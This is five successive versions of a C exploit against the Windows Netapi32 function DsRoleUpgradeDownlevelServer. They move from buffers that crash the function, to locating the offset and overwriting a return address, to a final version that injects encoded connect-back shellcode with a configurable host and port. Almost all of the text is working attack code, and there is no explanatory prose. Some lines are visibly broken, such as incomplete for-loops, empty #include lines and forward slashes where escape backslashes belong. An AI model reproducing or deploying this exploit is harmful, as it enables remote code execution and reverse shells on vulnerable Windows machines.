1.include
#include
#pragma comment(lib, "netapi32.lib")
#pragma comment(lib, "ws2_32.lib")
typedef int (_stdcall *DSROLEUPGRADEDOWNLEVELSERVER)
(unsigned long, unsigned long, unsigned long, unsigned long,
unsigned long, unsigned long, unsigned long, unsigned long,
unsigned long, unsigned long, unsigned long, unsigned long);
DSROLEUPGRADEDOWNLEVELSERVER DsRoleUpgradeDownlevelServer;
#define MAXLEN 5000
char buf[2*MAXLEN];
char buf2[2000];
void main(int argc, char**argv)
{
int i;
HMODULE hNetapi = LoadLibrary("Netapi32.dll");
if ( !hNetapi )
{
printf("Can't load Netapi32.dll.../n");
return;
}
DsRoleUpgradeDownlevelServer = (DSROLEUPGRADEDOWNLEVELSERVER)GetProcAddress(hNetapi, "DsRoleUpgradeDownlevelServer");
if ( !DsRoleUpgradeDownlevelServer )
{
printf("Can't get function DsRoleUpgradeDownlevelServer.../n");
return;
}
//Unicode (xx 00 xx 00 xx 00)
memset(buf, 0, MAXLEN*2);
for(i=0; i
buf[2*i] = 'A';
DsRoleUpgradeDownlevelServer(
(unsigned long)&buf[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0],
(unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0],
(unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0],
(unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0]);
return;
}
2.
#include
#include
#pragma comment(lib, "netapi32.lib")
#pragma comment(lib, "ws2_32.lib")
typedef int (_stdcall *DSROLEUPGRADEDOWNLEVELSERVER)
(unsigned long, unsigned long, unsigned long, unsigned long,
unsigned long, unsigned long, unsigned long, unsigned long,
unsigned long, unsigned long, unsigned long, unsigned long);
DSROLEUPGRADEDOWNLEVELSERVER DsRoleUpgradeDownlevelServer;
#define MAXLEN 5000
char buf[2*MAXLEN];
char buf2[2000];
void main(int argc, char**argv)
{
int i;
HMODULE hNetapi = LoadLibrary("Netapi32.dll");
if ( !hNetapi )
{
printf("Can't load Netapi32.dll.../n");
return;
}
DsRoleUpgradeDownlevelServer = (DSROLEUPGRADEDOWNLEVELSERVER)GetProcAddress(hNetapi, "DsRoleUpgradeDownlevelServer");
if ( !DsRoleUpgradeDownlevelServer )
{
printf("Can't get function DsRoleUpgradeDownlevelServer.../n");
return;
}
//Unicode (xx 00 xx 00 xx 00)
memset(buf, 0, MAXLEN*2);
for(i=0; i
buf[2*i] = (char)(i % 100 + 100);
DsRoleUpgradeDownlevelServer(
(unsigned long)&buf[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0],
(unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0],
(unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0],
(unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0]);
return;
}
3.
#include
#include
#pragma comment(lib, "netapi32.lib")
#pragma comment(lib, "ws2_32.lib")
typedef int (_stdcall *DSROLEUPGRADEDOWNLEVELSERVER)
(unsigned long, unsigned long, unsigned long, unsigned long,
unsigned long, unsigned long, unsigned long, unsigned long,
unsigned long, unsigned long, unsigned long, unsigned long);
DSROLEUPGRADEDOWNLEVELSERVER DsRoleUpgradeDownlevelServer;
#define MAXLEN 5000
char buf[2*MAXLEN];
char buf2[2000];
void main(int argc, char**argv)
{
int i;
HMODULE hNetapi = LoadLibrary("Netapi32.dll");
if ( !hNetapi )
{
printf("Can't load Netapi32.dll.../n");
return;
}
DsRoleUpgradeDownlevelServer = (DSROLEUPGRADEDOWNLEVELSERVER)GetProcAddress(hNetapi, "DsRoleUpgradeDownlevelServer");
if ( !DsRoleUpgradeDownlevelServer )
{
printf("Can't get function DsRoleUpgradeDownlevelServer.../n");
return;
}
//Unicode (xx 00 xx 00 xx 00)
memset(buf, 0, MAXLEN*2);
for(i=0; i
buf[2*i] = (char)(i / 100 + 100);
DsRoleUpgradeDownlevelServer(
(unsigned long)&buf[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0],
(unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0],
(unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0],
(unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0]);
return;
}
4.
#include
#include
#pragma comment(lib, "netapi32.lib")
#pragma comment(lib, "ws2_32.lib")
typedef int (_stdcall *DSROLEUPGRADEDOWNLEVELSERVER)
(unsigned long, unsigned long, unsigned long, unsigned long,
unsigned long, unsigned long, unsigned long, unsigned long,
unsigned long, unsigned long, unsigned long, unsigned long);
DSROLEUPGRADEDOWNLEVELSERVER DsRoleUpgradeDownlevelServer;
#define MAXLEN 5000
char buf[2*MAXLEN];
char buf2[2000];
void main(int argc, char**argv)
{
int i;
HMODULE hNetapi = LoadLibrary("Netapi32.dll");
if ( !hNetapi )
{
printf("Can't load Netapi32.dll.../n");
return;
}
DsRoleUpgradeDownlevelServer = (DSROLEUPGRADEDOWNLEVELSERVER)GetProcAddress(hNetapi, "DsRoleUpgradeDownlevelServer");
if ( !DsRoleUpgradeDownlevelServer )
{
printf("Can't get function DsRoleUpgradeDownlevelServer.../n");
return;
}
//Unicode (xx 00 xx 00 xx 00)
memset(buf, 0, MAXLEN*2);
for(i=0; i
buf[2*i] = (char)(i / 100 + 100);
//i = 2844 ~ 2847, values 0x7FFA1571
buf[2*2844] = 0x71;
buf[2*2845] = 0x15;
buf[2*2846] = 0xFA;
buf[2*2847] = 0x7F;
DsRoleUpgradeDownlevelServer(
(unsigned long)&buf[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0],
(unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0],
(unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0],
(unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0]);
return;
}
5.
#include
#include
#pragma comment(lib, "netapi32.lib")
#pragma comment(lib, "ws2_32.lib")
typedef int (_stdcall *DSROLEUPGRADEDOWNLEVELSERVER)
(unsigned long, unsigned long, unsigned long, unsigned long,
unsigned long, unsigned long, unsigned long, unsigned long,
unsigned long, unsigned long, unsigned long, unsigned long);
DSROLEUPGRADEDOWNLEVELSERVER DsRoleUpgradeDownlevelServer;
#define MAXLEN 5000
char buf[2*MAXLEN];
char buf2[2000];
#define PORT_OFFSET 118
#define IP_OFFSET 111
char Shellcode[] = "/xEB/x10/x5B/x4B/x33/xC9/x66/xB9/x25/x01/x80/x34/x0B/x99/xE2/xFA"
"/xEB/x05/xE8/xEB/xFF/xFF/xFF"
"/x70/x62/x99/x99/x99/xC6/xFD/x38/xA9/x99/x99/x99/x12/xD9/x95/x12"
"/xE9/x85/x34/x12/xF1/x91/x12/x6E/xF3/x9D/xC0/x71/x02/x99/x99/x99"
"/x7B/x60/xF1/xAA/xAB/x99/x99/xF1/xEE/xEA/xAB/xC6/xCD/x66/x8F/x12"
"/x71/xF3/x9D/xC0/x71/x1B/x99/x99/x99/x7B/x60/x18/x75/x09/x98/x99"
"/x99/xCD/xF1/x98/x98/x99/x99/x66/xCF/x89/xC9/xC9/xC9/xC9/xD9/xC9"
"/xD9/xC9/x66/xCF/x8D/x12/x41/xF1/xE6/x99/x99/x98/xF1/x9B/x99/x99"
"/xAC/x12/x55/xF3/x89/xC8/xCA/x66/xCF/x81/x1C/x59/xEC/xD3/xF1/xFA"
"/xF4/xFD/x99/x10/xFF/xA9/x1A/x75/xCD/x14/xA5/xBD/xF3/x8C/xC0/x32"
"/x7B/x64/x5F/xDD/xBD/x89/xDD/x67/xDD/xBD/xA4/x10/xC5/xBD/xD1/x10"
"/xC5/xBD/xD5/x10/xC5/xBD/xC9/x14/xDD/xBD/x89/xCD/xC9/xC8/xC8/xC8"
"/xF3/x98/xC8/xC8/x66/xEF/xA9/xC8/x66/xCF/x9D/x12/x55/xF3/x66/x66"
"/xA8/x66/xCF/x91/xCA/x66/xCF/x85/x66/xCF/x95/xC8/xCF/x12/xDC/xA5"
"/x12/xCD/xB1/xE1/x9A/x4C/xCB/x12/xEB/xB9/x9A/x6C/xAA/x50/xD0/xD8"
"/x34/x9A/x5C/xAA/x42/x96/x27/x89/xA3/x4F/xED/x91/x58/x52/x94/x9A"
"/x43/xD9/x72/x68/xA2/x86/xEC/x7E/xC3/x12/xC3/xBD/x9A/x44/xFF/x12"
"/x95/xD2/x12/xC3/x85/x9A/x44/x12/x9D/x12/x9A/x5C/x32/xC7/xC0/x5A"
"/x71/x99/x66/x66/x66/x17/xD7/x97/x75/xEB/x67/x2A/x8F/x34/x40/x9C"
"/x57/xE7/x41/x7B/xEA/x52/x74/x65/xA2/x40/x90/x6C/x34/x75/x60/x33"
"/xF9/x7E/xE0/x5F/xE0";
void MShell(char *h, char *p)
{
unsigned short port;
unsigned long ip;
port = htons(atoi(p))^(USHORT)0x9999;
ip = inet_addr(h)^(ULONG)0x99999999;
memcpy(&Shellcode[PORT_OFFSET], &port, 2);
memcpy(&Shellcode[IP_OFFSET], &ip, 4);
}
void main(int argc, char**argv)
{
int i;
HMODULE hNetapi = LoadLibrary("Netapi32.dll");
if ( !hNetapi )
{
printf("Can't load Netapi32.dll.../n");
return;
}
DsRoleUpgradeDownlevelServer = (DSROLEUPGRADEDOWNLEVELSERVER)GetProcAddress(hNetapi, "DsRoleUpgradeDownlevelServer");
if ( !DsRoleUpgradeDownlevelServer )
{
printf("Can't get function DsRoleUpgradeDownlevelServer.../n");
return;
}
//Unicode (xx 00 xx 00 xx 00)
memset(buf, 0, MAXLEN*2);
for(i=0; i
buf[2*i] = (char)(i / 100 + 100);
//i = 2844 ~ 2847, values 0x7FFA1571
buf[2*2844] = 0x71;
buf[2*2845] = 0x15;
buf[2*2846] = 0xFA;
buf[2*2847] = 0x7F;
//i = 2840 ~ 2843, nop/nop/jmp 4, values 90 90 EB 04
buf[2*2840] = 0x90;
buf[2*2841] = 0x90;
buf[2*2842] = 0xEB;
buf[2*2843] = 0x04;
MShell("127.0.0.1", "1111"); //shellcode connect back to port 1111
for(i=0;i < sizeof(Shellcode);i++)
buf[2*(i+2848)] = Shellcode[i];
DsRoleUpgradeDownlevelServer(
(unsigned long)&buf[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0],
(unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0],
(unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0],
(unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0]);
return;
}